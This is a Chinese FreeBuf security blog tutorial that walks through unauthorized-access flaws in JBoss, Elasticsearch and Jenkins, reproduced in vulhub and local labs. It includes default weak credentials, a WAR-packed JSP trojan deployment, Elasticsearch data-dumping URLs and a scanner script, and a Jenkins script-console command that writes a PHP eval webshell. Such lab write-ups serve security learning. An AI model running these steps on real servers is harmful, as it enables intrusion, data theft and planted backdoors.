freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

未授权访问
开冲 2022-04-02 17:53:44 142681
所属地 吉林省

前言

之前学姐他们面试问到了中间件,吓得我赶紧学习学习中间件相关知识点,学习内容较浅,也请各位师傅帮我补充补充,纠正文章错误,一起学习!

中间件

中间件是软件,作用于系统软件和应用软件之间,软件各部件之间,管理着客户机与系统软件之间的计算资源和网络通信,为应用软件服务,应用软件为最终用户服务,最终用户并不直接使用中间件。

工具开发出来就是为了便捷。

jboss未授权访问

介绍

jboss存在未授权访问,通过该漏洞,可以后台管理服务,脚本命令执行系统命令,如反弹shell,wget写webshell文件。

可以通过未授权访问控制台。

弱口令如下:

admin/admin

admin/123456

利用应用部署war包,war里面可以放置jsp包,可以利用jsp包实现webshell写文件,反弹shell。

war制作

jar cvf shell.war shell.jsp

jsp为你准备的木马条件,war应用文件。

环境搭建

漏洞环境:vulhub上的CVE-2017-7504
进入到CVE-2017-7504目录执行docker-compose up -d

部署文件

找到上传位置:1648892043_6248188bd16d9d214317a.png!small?1648892045963

上传war,

用kali的远程服务器部署,

在var/www/html目录放入war包。

打开http服务:service apache2 start

访问:http:ip/部署的war前缀,如shell.war可写shell

1648892109_624818cdd6b8df9ce9566.png!small?1648892112177

看到了shell.jsp,可以拿出冰蝎。

1648892139_624818eb3554953fee768.png!small?1648892141298

Elasticsearch未授权

介绍

基于java开发的企业级搜索服务,提供分布式多用户的全文搜索引擎。 启动此服务默认会开放9200端口,可被非法操作数据。

当节点启动,会利用多播或单播寻找集群中的其他节点,并建立连接。默认开启9200端口,黑客就可以搜索信息。

相当于一个API,任何人访问这个地址,就可以调用api,进行数据的增删改操作。
http://x.x.x.x:9200/_nodes

http://x.x.x.x:9200/_river

漏洞测试

下载该软件,安装。

安装错误:

1648892541_62481a7d14c9282eef69f.png!small?1648892543448

以记事本形式打开config目录下的jvm.options文件,将:


-XX:+UseConcMarkSweepGC

-XX:CMSInitiatingOccupancyFraction=75

-XX:+UseCMSInitiatingOccupancyOnly

修改为:

#-XX:+UseConcMarkSweepGC

#-XX:CMSInitiatingOccupancyFraction=75

#-XX:+UseCMSInitiatingOccupancyOnly

可以浏览器搜索网段

localhost:9200

http://ip:9200/_cat/indices获取所有的index

1648892628_62481ad4506f967cc5426.png!small?1648892630402

http://ip:9200/_mapping?pretty=true获取index下的所有的type

1648892664_62481af80d2937b7f1871.png!small?1648892666118

检测脚本

#! /usr/bin/env python
# _*_  coding:utf-8 _*_

import requests
def Elasticsearch_check(ip, port=9200, timeout=5):
try:
url = "http://"+ip+":"+str(port)+"/_cat"
response = requests.get(url) 
except:
pass
if "/_cat/master" in response.content:
print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port)

漏洞测试

http://ip:9200/pv_fun_all/school/_search?pretty=true 获取该index下该type下的内容
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search 查看数据库敏感信息
http://localhost:9200/_nodes 查看节点数据

如有安装head插件:
http://localhost:9200/_plugin/head/ web管理界面

jenkins未授权访问

介绍

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

默认端口为8080

漏洞复现

安装jenkins

链接:https://pan.baidu.com/s/1PzUlSp7Cw82x6zVsvpI6FA

提取码:9528

下载成功,运行后任务管理器开启jenkins服务。

然后再浏览器输入http://localhost:8080

找到脚本命令行,输入

println "whoami".execute().text

1648892912_62481bf0312fe332f5425.png!small?1648892914291

上传webshell

new File("D:\\phpstudy_pro\\WWW\\ma.php").write('<?php @eval($_POST[cmd]);?>');

蚁剑连接,成功。

1648892955_62481c1b96424104b9077.png!small?1648892957722


# web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 开冲 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
开冲 LV.5
这家伙太懒了,还未填写个人描述!
  • 18 文章数
  • 17 关注者
vulnstack靶场:ATT&CK攻击-1
2022-06-27
对Linux提权的简单总结[中]
2022-06-13
[VulnHub]hackdale:2靶场记录
2022-05-19
文章目录